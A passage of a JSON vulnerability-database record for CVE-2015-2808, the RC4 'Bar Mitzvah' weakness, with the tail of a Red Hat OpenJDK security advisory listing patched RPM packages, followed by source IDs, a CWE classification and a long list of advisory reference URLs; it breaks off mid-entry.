7):\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.2.el7_1.noarch.rpm\n\nppc64:\njava-1.7.0-openjdk-accessibility-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm\njava-1.7.0-openjdk-demo-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm\njava-1.7.0-openjdk-src-1.7.0.85-2.6.1.2.el7_1.ppc64.rpm\n\ns390x:\njava-1.7.0-openjdk-accessibility-1.7.0.85-2.6.1.2.el7_1.s390x.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.s390x.rpm\njava-1.7.0-openjdk-demo-1.7.0.85-2.6.1.2.el7_1.s390x.rpm\njava-1.7.0-openjdk-src-1.7.0.85-2.6.1.2.el7_1.s390x.rpm\n\nx86_64:\njava-1.7.0-openjdk-accessibility-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.2.ael7b_1.noarch.rpm\n\nppc64le:\njava-1.7.0-openjdk-accessibility-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm\njava-1.7.0-openjdk-demo-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm\njava-1.7.0-openjdk-src-1.7.0.85-2.6.1.2.ael7b_1.ppc64le.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.src.rpm\n\nx86_64:\njava-1.7.0-openjdk-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-devel-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-headless-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\njava-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.2.el7_1.noarch.rpm\n\nx86_64:\njava-1.7.0-openjdk-accessibility-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-demo-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\njava-1.7.0-openjdk-src-1.7.0.85-2.6.1.2.el7_1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-2590\nhttps://access.redhat.com/security/cve/CVE-2015-2601\nhttps://access.redhat.com/security/cve/CVE-2015-2621\nhttps://access.redhat.com/security/cve/CVE-2015-2625\nhttps://access.redhat.com/security/cve/CVE-2015-2628\nhttps://access.redhat.com/security/cve/CVE-2015-2632\nhttps://access.redhat.com/security/cve/CVE-2015-2808\nhttps://access.redhat.com/security/cve/CVE-2015-4000\nhttps://access.redhat.com/security/cve/CVE-2015-4731\nhttps://access.redhat.com/security/cve/CVE-2015-4732\nhttps://access.redhat.com/security/cve/CVE-2015-4733\nhttps://access.redhat.com/security/cve/CVE-2015-4748\nhttps://access.redhat.com/security/cve/CVE-2015-4749\nhttps://access.redhat.com/security/cve/CVE-2015-4760\nhttps://access.redhat.com/security/updates/classification/#critical\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1207101#c11\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1223211#c33\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFVpliAXlSAg2UNWIIRAmDIAKC0SKJPEBiUrI0sgDcQMZTM/nm7nwCfUIje\nQU57Hj/UGZeY+OmKchPFPcI=\n=miFC\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n", "sources": [ { "db": "NVD", "id": "CVE-2015-2808" }, { "db": "BID", "id": "73684" }, { "db": "VULHUB", "id": "VHN-80769" }, { "db": "PACKETSTORM", "id": "133274" }, { "db": "PACKETSTORM", "id": "133234" }, { "db": "PACKETSTORM", "id": "133344" }, { "db": "PACKETSTORM", "id": "135088" }, { "db": "PACKETSTORM", "id": "133366" }, { "db": "PACKETSTORM", "id": "138866" }, { "db": "PACKETSTORM", "id": "132729" }, { "db": "PACKETSTORM", "id": "133990" }, { "db": "PACKETSTORM", "id": "132728" }, { "db": "PACKETSTORM", "id": "132345" }, { "db": "PACKETSTORM", "id": "136248" }, { "db": "PACKETSTORM", "id": "132697" } ], "trust": 2.34 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-80769", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-80769" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-2808", "trust": 2.6 }, { "db": "BID", "id": "73684", "trust": 1.4 }, { "db": "JUNIPER", "id": "JSA10783", "trust": 1.4 }, { "db": "BID", "id": "91787", "trust": 1.1 }, { "db": "SECTRACK", "id": "1032788", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033737", "trust": 1.1 }, { "db": "SECTRACK", "id": "1032734", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033432", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033071", "trust": 1.1 }, { "db": "SECTRACK", "id": "1036222", "trust": 1.1 }, { "db": "SECTRACK", "id": "1032708", "trust": 1.1 }, { "db": "SECTRACK", "id": "1032868", "trust": 1.1 }, { "db": "SECTRACK", "id": "1032990", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033072", "trust": 1.1 }, { "db": "SECTRACK", "id": "1032910", "trust": 1.1 }, { "db": "SECTRACK", "id": "1032858", "trust": 1.1 }, { "db": "SECTRACK", "id": "1032600", "trust": 1.1 }, { "db": "SECTRACK", "id": "1032599", "trust": 1.1 }, { "db": "SECTRACK", "id": "1032707", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033386", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033415", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033431", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033769", "trust": 1.1 }, { "db": "JUNIPER", "id": "JSA10705", "trust": 1.1 }, { "db": "JUNIPER", "id": "JSA10727", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10163", "trust": 1.1 }, { "db": "PACKETSTORM", "id": "133344", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "133366", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "136248", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "132345", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "132872", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132592", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133330", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133337", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133392", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132890", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133336", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132891", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133329", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133391", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132753", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137746", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135172", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136773", "trust": 0.1 }, { "db": "CNNVD", "id": "CNNVD-201503-654", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-80769", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133274", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133234", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135088", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138866", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132729", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133990", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132728", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132697", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-80769" }, { "db": "BID", "id": "73684" }, { "db": "PACKETSTORM", "id": "133274" }, { "db": "PACKETSTORM", "id": "133234" }, { "db": "PACKETSTORM", "id": "133344" }, { "db": "PACKETSTORM", "id": "135088" }, { "db": "PACKETSTORM", "id": "133366" }, { "db": "PACKETSTORM", "id": "138866" }, { "db": "PACKETSTORM", "id": "132729" }, { "db": "PACKETSTORM", "id": "133990" }, { "db": "PACKETSTORM", "id": "132728" }, { "db": "PACKETSTORM", "id": "132345" }, { "db": "PACKETSTORM", "id": "136248" }, { "db": "PACKETSTORM", "id": "132697" }, { "db": "NVD", "id": "CVE-2015-2808" } ] }, "id": "VAR-201504-0247", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-80769" } ], "trust": 0.7700035949999998 }, "last_update_date": "2024-11-29T19:56:33.122000Z", "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-327", "trust": 1.0 }, { "problemtype": "CWE-310", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-80769" }, { "db": "NVD", "id": "CVE-2015-2808" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2015-1229.html" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2015-1242.html" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2015-1243.html" }, { "trust": 1.4, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04779034" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883640" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "trust": 1.4, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098709" }, { "trust": 1.4, "url": "https://www.blackhat.com/docs/asia-15/materials/asia-15-mantin-bar-mitzvah-attack-breaking-ssl-with-13-year-old-rc4-weakness-wp.pdf" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2015-1007.html" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2015-1020.html" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2015-1228.html" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2015-1230.html" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2015-1241.html" }, { "trust": 1.2, "url": "https://security.gentoo.org/glsa/201512-10" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv71888" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv71892" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/73684" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/91787" }, { "trust": 1.1, "url": "http://www-304.ibm.com/support/docview.wss?uid=swg21903565" }, { "trust": 1.1, "url": "http://www-304.ibm.com/support/docview.wss?uid=swg21960015" }, { "trust": 1.1, "url": "http://www-304.ibm.com/support/docview.wss?uid=swg21960769" }, { "trust": 1.1, "url": "http://www.huawei.com/en/psirt/security-advisories/hw-454055" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.1, "url": "http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-454055.htm" }, { "trust": 1.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04770140" }, { "trust": 1.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04772190" }, { "trust": 1.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04773119" }, { "trust": 1.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04773241" }, { "trust": 1.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04773256" }, { "trust": 1.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04832246" }, { "trust": 1.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04926789" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04708650" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04711380" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05085988" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05193347" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05289935" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05336888" }, { "trust": 1.1, "url": "https://kb.juniper.net/jsa10783" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3316" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3339" }, { "trust": 1.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04687922" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-1006.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-1021.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-1091.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2015-1526.html" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1032599" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1032600" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1032707" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1032708" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1032734" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1032788" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1032858" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1032868" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1032910" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1032990" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033071" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033072" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033386" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033415" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033431" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033432" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033737" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033769" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1036222" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00013.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00014.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00015.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00022.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00031.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00046.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00047.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00000.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00004.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00005.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00039.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00040.html" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2696-1" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2706-1" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2808" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=144060606031437\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=144060576831314\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143817899717054\u0026w=2" }, { "trust": 1.0, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10705" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143456209711959\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=144102017024820\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=144043644216842\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=144069189622016\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=144104533800819\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=144059703728085\u0026w=2" }, { "trust": 1.0, "url": "https://www.secpod.com/blog/cve-2015-2808-bar-mitzvah-attack-in-rc4-2/" }, { "trust": 1.0, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10727" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=144059660127919\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=144104565600964\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143741441012338\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143818140118771\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143629696317098\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143817021313142\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=144493176821532\u0026w=2" }, { "trust": 1.0, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10163" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4000" }, { "trust": 0.5, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.5, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.4, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4732" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4748" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2628" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2632" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4733" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4749" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2625" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4760" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2601" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2621" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4731" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2590" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1207101" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/aug/158" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/jun/93" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/jul/37" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/jul/97" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2016/mar/109" }, { "trust": 0.3, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10783\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/jul/140" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/jul/131" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/jul/138" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04711380" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04767175" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04772190" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04773256" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04773004" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04777195" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04777255" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05193347" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05347541" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05336888" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04770140" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04926789" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04832246" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022548" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022550" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020690" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020715" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1005196" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1005197" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005199" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1005210" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1005212" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1005319 " }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005334" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21700896" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21701114" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21701358" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21701359" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21701548" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21701559" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701600" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21701612" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701640" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21701904" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701967" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701969" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21702170" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21702796" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21702801" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21702821" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21703436" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21708278" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21713608" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21713636" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21713646" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21713652" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21715538" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21715543" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21717865" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21717865" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21719390" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21720186" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21720187" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21722402" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21722406" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21875279" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882551" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882579" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882645" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21882684" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21882689" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882706" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882778" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882825" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21882888" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882901" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21882969" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882999" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21883226" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883250" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21883260" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902260" }, { "trust": 0.3, "url": 